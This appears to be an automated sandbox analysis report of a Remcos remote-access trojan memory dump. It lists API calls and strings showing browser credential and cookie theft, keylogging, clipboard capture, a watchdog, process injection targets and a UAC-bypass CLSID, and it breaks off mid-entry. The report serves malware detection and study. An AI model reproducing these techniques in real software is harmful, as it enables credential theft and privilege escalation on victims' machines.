Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB

OpenMutexA.KERNEL32 ref: 00412146
CloseHandle.KERNEL32(00000000), ref: 00412155
CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A

Strings

\system32\, xrefs: 00412209
svchost.exe, xrefs: 004122C5
Remcos restarted by watchdog!, xrefs: 00412160
Watchdog module activated, xrefs: 00412184, 004123DC
rmclient.exe, xrefs: 004122EA
\SysWOW64\, xrefs: 00412261
WDH, xrefs: 004121B5, 004121BB, 00412420
fsutil.exe, xrefs: 0041230F
Watchdog launch failed!, xrefs: 00412383
WinDir, xrefs: 0041221B, 00412270

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
API String ID: 3018269243-13974260
Opcode ID: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
Opcode Fuzzy Hash: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E

Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
FindClose.KERNEL32(00000000), ref: 0040BBC9
FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
FindClose.KERNEL32(00000000), ref: 0040BD12

Strings

[Firefox StoredLogins Cleared!], xrefs: 0040BCFF
\logins.json, xrefs: 0040BC34
\key3.db, xrefs: 0040BC76
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BB52
UserProfile, xrefs: 0040BB60
[Firefox StoredLogins not found], xrefs: 0040BBD4

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89

Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004168C2
EmptyClipboard.USER32 ref: 004168D0
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
GlobalLock.KERNEL32 ref: 004168F9
GlobalUnlock.KERNEL32(00000000), ref: 0041692F
SetClipboardData.USER32 ref: 00416938
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32 ref: 0041696C
GlobalLock.KERNEL32 ref: 00416975
GlobalUnlock.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID: !D@
API String ID: 3520204547-604454484
Opcode ID: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
Opcode Fuzzy Hash: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A

Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
FindClose.KERNEL32(00000000), ref: 0040BDC9
FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
FindClose.KERNEL32(00000000), ref: 0040BEAF
FindClose.KERNEL32(00000000), ref: 0040BED0

Strings

[Firefox Cookies not found], xrefs: 0040BDD4, 0040BE9C
\cookies.sqlite, xrefs: 0040BE2C
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BD52
UserProfile, xrefs: 0040BD60
[Firefox cookies found, cleared!], xrefs: 0040BEDF

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
Opcode Fuzzy Hash: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E

Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
CloseHandle.KERNEL32(00000000), ref: 0040F563

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

CloseHandle.KERNEL32(00000000), ref: 0040F66E

Strings

Inj, xrefs: 0040F769
C:\Program Files(x86)\Internet Explorer\, xrefs: 0040F6BE
ieinstal.exe, xrefs: 0040F6D5
ielowutil.exe, xrefs: 0040F716

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
API String ID: 3756808967-1743721670
Opcode ID: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
Opcode Fuzzy Hash: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A

Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON

Download Yara Rule

Strings

5, xrefs: 00419809
6, xrefs: 00419813
1, xrefs: 00419695
0, xrefs: 00419651
7, xrefs: 0041982A
2, xrefs: 004196F4
4, xrefs: 004197B8
3, xrefs: 00419754
VG, xrefs: 0041968B

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7$VG
API String ID: 0-1861860590
Opcode ID: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
Opcode Fuzzy Hash: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96

Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00407521
CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

Strings

[+] CoGetObject SUCCESS, xrefs: 00407595
$, xrefs: 0040753B
Elevation:Administrator!new:, xrefs: 00407542
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 00407516, 0040751B, 0040755A
[+] CoGetObject, xrefs: 00407561
[-] CoGetObject FAILURE, xrefs: 0040758E
[+] ucmAllocateElevatedObject, xrefs: 00407508

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-3166923314
Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA

Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
GetLastError.KERNEL32 ref: 0041A7BB
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: b5cb2cce8405c774e90894dca81b601ecff233847bd43264dc3cebac0f8f2ebe
Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
Opcode Fuzzy Hash: b5cb2cce8405c774e90894dca81b601ecff233847bd43264dc3cebac0f8f2ebe
Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A

Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
IsValidCodePage.KERNEL32(00000000), ref: 00452777
IsValidLocale.KERNEL32(?,00000001), ref: 00452786
GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED

Strings

lJD, xrefs: 00452639, 00452649, 00452709, 004526AB, 004526A0, 004526A3, 004526AE, 0045270C
lJD, xrefs: 00452626, 004527C5
lJD, xrefs: 004526E7, 004526F2, 00452745

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: lJD$lJD$lJD
API String ID: 745075371-479184356
Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69

Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
FindClose.KERNEL32(00000000), ref: 0040C47D
FindClose.KERNEL32(00000000), ref: 0040C4A8

Strings

\Mozilla\Firefox\Profiles\, xrefs: 0040C36E
AppData, xrefs: 0040C358
\cookies.sqlite, xrefs: 0040C409

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 1164774033-405221262
Opcode ID: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
Opcode Fuzzy Hash: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D

Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B

Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371

GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68

Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E

Strings

8SG, xrefs: 00419BEB
PXG, xrefs: 00419CC8
NG, xrefs: 00419B25
PG, xrefs: 00419BD5
PXG, xrefs: 00419E2E

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: 8SG$PXG$PXG$NG$PG
API String ID: 341183262-3812160132
Opcode ID: a5597b3f65d10343650a1b8aec819c1f417a5ef5d46547a6ada3e27d2cae3aed
Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
Opcode Fuzzy Hash: a5597b3f65d10343650a1b8aec819c1f417a5ef5d46547a6ada3e27d2cae3aed
Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A

Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0040A416
GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
GetKeyboardLayout.USER32 ref: 0040A429
GetKeyState.USER32(00000010), ref: 0040A433
GetKeyboardState.USER32(?), ref: 0040A43E
ToUnicodeEx.USER32 ref: 0040A461
ToUnicodeEx.USER32 ref: 0040A4C1
ToUnicodeEx.USER32 ref: 0040A4FA

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
String ID:
API String ID: 1888522110-0
Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6

Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
RegCloseKey.ADVAPI32(?), ref: 004140A9

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
GetProcAddress.KERNEL32(00000000), ref: 00414271

Strings

SHDeleteKeyW, xrefs: 00414260
Shlwapi.dll, xrefs: 00414265

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: d8728620bcedfbf95b0a0fc4e553f00c45b98f8cdcebe4b8e1ae684bfe74d4de
Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
Opcode Fuzzy Hash: d8728620bcedfbf95b0a0fc4e553f00c45b98f8cdcebe4b8e1ae684bfe74d4de
Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA

Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00449212
_free.LIBCMT ref: 00449236
_free.LIBCMT ref: 004493BD
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758

Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D

ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
GetProcAddress.KERNEL32(00000000), ref: 00416872

Strings

!D@, xrefs: 00417089
PowrProf.dll, xrefs: 00416866
SetSuspendState, xrefs: 00416861

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: !D@$PowrProf.dll$SetSuspendState
API String ID: 1589313981-2876530381
Opcode ID: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
Opcode Fuzzy Hash: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE

Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513

Strings

['E, xrefs: 004524F3, 004524CA
OCP, xrefs: 00452490
ACP, xrefs: 0045245A

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP$['E
API String ID: 2299586839-2532616801
Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398

Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
GetLastError.KERNEL32 ref: 0040BA58

Strings

[Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
[Chrome StoredLogins not found], xrefs: 0040BA72
UserProfile, xrefs: 0040BA1E

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE

Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
OpenProcessToken.ADVAPI32(00000000), ref: 00417966
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
GetLastError.KERNEL32 ref: 0041799D

Strings

SeShutdownPrivilege, xrefs: 00417972

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5

Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409258

Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0

